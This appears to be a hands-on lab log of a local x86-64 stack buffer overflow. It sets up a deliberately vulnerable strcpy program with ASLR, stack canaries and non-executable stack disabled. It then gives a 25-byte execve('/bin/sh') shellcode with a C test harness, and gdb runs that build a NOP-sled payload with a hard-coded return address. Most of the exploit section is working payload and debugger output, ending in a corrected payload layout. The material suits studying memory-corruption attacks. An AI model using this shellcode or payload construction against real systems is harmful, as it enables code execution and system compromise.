- root@kali:/tmp# cat /proc/sys/kernel/randomize_va_space
- 0
- GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
- 0x0000000000000000 0x0000000000000000 RWE 0x10
- root@kali:/tmp# file vuln2
- vuln2: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=8102b60ffa8c26f231e4184d2f49b2e7c26a18b9, not stripped
- root@kali:/tmp# lscpu | grep 'Byte Order'
- Byte Order: Little Endian
#include <stdio.h>
#include <string.h>
- int main(int argc, char *argv[]){
- char buf[512];
- strcpy(buf, argv[1]);
- return 0;
- }
- gcc -o vuln2 vuln2.c -fno-stack-protector -z execstack   # no stack canary, and GNU_STACK becomes RWE (see the readelf output above); the binary is still a PIE, which is only harmless while randomize_va_space is 0
- \x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05   (25 bytes; the paste stripped the backslashes. Decodes to: mov rbx, 0xff978cd091969dd1 / neg rbx -> "/bin/sh\0" / push rbx / xor eax,eax / cdq / xor esi,esi / push rsp / pop rdi / mov al,0x3b / syscall, i.e. execve("/bin/sh", NULL, NULL))
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
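/* Raw execve("/bin/sh") payload, 25 bytes (the NUL appended by the string
 * literal is never executed):
 *   mov rbx, 0xff978cd091969dd1 ; neg rbx   -> rbx = "/bin/sh\0"
 *   push rbx ; xor eax,eax ; cdq ; xor esi,esi ; push rsp ; pop rdi
 *   mov al, 0x3b ; syscall                 -> execve(rdi, NULL, NULL)
 * The array lives in writable, non-executable .data, so the page(s) holding it
 * must be made executable before jumping to it. */
char code[] = "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05";

int main(void){
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0) {
        perror("sysconf");
        return 1;
    }
    /* Page-align the whole array, not just its first byte: a payload that
     * straddles a page boundary needs both pages marked executable. */
    uintptr_t mask  = (uintptr_t)page - 1;
    uintptr_t start = (uintptr_t)code & ~mask;
    uintptr_t end   = ((uintptr_t)code + sizeof code + mask) & ~mask;
    /* PROT_READ|PROT_EXEC also drops write permission from every other .data
     * object sharing these pages; add PROT_WRITE if that ever matters.
     * An unchecked failure here used to turn into a bare SIGSEGV at the call. */
    if (mprotect((void *)start, end - start, PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect");   /* NOTE(review): likely a policy denial, e.g. SELinux execmem - confirm */
        return 1;
    }
    /* Object-to-function pointer cast is not ISO C, but it is the usual POSIX idiom. */
    ((void (*)(void))code)();
    return 0;   /* only reached if the payload returns instead of execve'ing */
}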
- (gdb) r $(python -c 'print "A"*526')
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /tmp/vuln2 $(python -c 'print "A"*526')
- Program received signal SIGSEGV, Segmentation fault.
- 0x0000414141414141 in ?? ()
- (gdb) x/x $rip
- 0x414141414141: Cannot access memory at address 0x414141414141
- (gdb) x/100x $rsp
- 0x7fffffffdd60: 0xffffe058 0x00007fff 0xf7fd3298 0x00000002
- 0x7fffffffdd70: 0x41414141 0x41414141 0x41414141 0x41414141
- 0x7fffffffdd80: 0x41414141 0x41414141 0x41414141 0x41414141
- 0x7fffffffdd90: 0x41414141 0x41414141 0x41414141 0x41414141
- (gdb) x/x $rbp
- 0x7fffffffdf70: 0x41414141
- (gdb) r $(python -c 'print "\x90"*495+"\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"+"\x90\xdd\xff\xff\xff\x7f"')
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /tmp/vuln2 $(python -c 'print "\x90"*495+"\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"+"\x90\xdd\xff\xff\xff\x7f"')
- Program received signal SIGILL, Illegal instruction.
- 0x00007fffffffdf73 in ?? ()
- Why SIGILL instead of a shell (assuming buf sits at the same address in both runs - same argv length, same gdb environment): buf starts at 0x7fffffffdd70 (dump above), so the 495-byte sled places the 25-byte payload at 0x7fffffffdf5f-0x7fffffffdf77, directly below the overwritten return slot at buf+520. After `ret` the stack pointer is 0x7fffffffdf80; the payload's own `push rbx` and `push rsp` then store 8 bytes at 0x7fffffffdf78 and 0x7fffffffdf70, and the second store lands on the payload's last eight bytes (xor esi,esi / push rsp / pop rdi / mov al,0x3b / syscall). The pushed value 0x00007fffffffdf78 leaves 0xff 0xff at 0x7fffffffdf73 - the very next instruction to fetch - which decodes to an undefined opcode, matching the faulting address reported. Fix: keep the payload well below the return slot, e.g. "\x90"*400 + shellcode + "\x90"*95 + "\x90\xdd\xff\xff\xff\x7f" (still 526 bytes, and 0x7fffffffdd90 still lands in the sled). Outside gdb the stack can shift with the environment, so re-check buf's address before trusting the hard-coded return value.